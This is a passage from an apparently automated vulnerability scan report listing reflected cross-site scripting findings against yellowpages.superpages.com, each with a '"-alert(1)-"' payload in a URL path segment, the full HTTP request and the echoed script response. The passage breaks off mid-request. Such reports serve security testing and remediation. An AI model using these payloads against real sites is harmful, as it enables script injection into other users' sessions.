Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/iepopup.js57121&quot;-alert(1)-&quot;a019059d18b
Server: Unspecified
Set-Cookie: JSESSIONID=5FEE5F212D4C070AC3E37397025C1DA1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:20 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/iepopup.js57121"-alert(1)-"a019059d18b?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.603. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common12235&quot;-alert(1)-&quot;2aa4880554e/js/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=199509FE8D2800AF9160EA7047F290DD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.604. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js6e853&quot;-alert(1)-&quot;4df34621227/jquery-1.4.2.min.js
Server: Unspecified
Set-Cookie: JSESSIONID=3139A329C5301E9058E04DFF871BCCF1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.605. http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-1.4.2.min.js4c940&quot;-alert(1)-&quot;8d600cbb5e6
Server: Unspecified
Set-Cookie: JSESSIONID=1640D122FA5011C752860F98D405C757; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.606. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonf4138&quot;-alert(1)-&quot;d392b5225e3/js/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=9572D1720D04456BA7DF5D05EB1798D8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:40 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.607. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdc582&quot;-alert(1)-&quot;51b3ea3bf60/jquery-plugins.js
Server: Unspecified
Set-Cookie: JSESSIONID=09CE7FF4251840525CF01CD53A9C9A17; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:59 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.608. http://yellowpages.superpages.com/common/js/jquery-plugins.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-plugins.jsfce99&quot;-alert(1)-&quot;1f8bcc299d1
Server: Unspecified
Set-Cookie: JSESSIONID=D2531DC67D815FBBB68818C02A80D6CB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:07 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common39dde&quot;-alert(1)-&quot;ad48974274b/js/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=C15B868960CE2EE9AF292572256EADF3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:02 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsc965f&quot;-alert(1)-&quot;9b53f386972/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=6AA4650E7009D0260F993E6AB745753B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.history_remote.jsdfa09&quot;-alert(1)-&quot;556c143ae67
Server: Unspecified
Set-Cookie: JSESSIONID=AC0419B6F8814437382178A41C7FB943; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:30 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
perpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond7dc5&quot;-alert(1)-&quot;f36372d39f5/js/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=7F42488F4AB9870477CB7A261876420D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:24 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js2c12c&quot;-alert(1)-&quot;1659686fb48/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=560FCD4338D535363C1D59CFD5091B2B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:32 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.sptabs.jsfc50d&quot;-alert(1)-&quot;069a0f815e6
Server: Unspecified
Set-Cookie: JSESSIONID=96C846039494DE3D303C28223283100E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common9a2a7&quot;-alert(1)-&quot;fc51b2a718c/js/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=76DD5A47FC1A71E27DFC56B0F9C6C5FD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
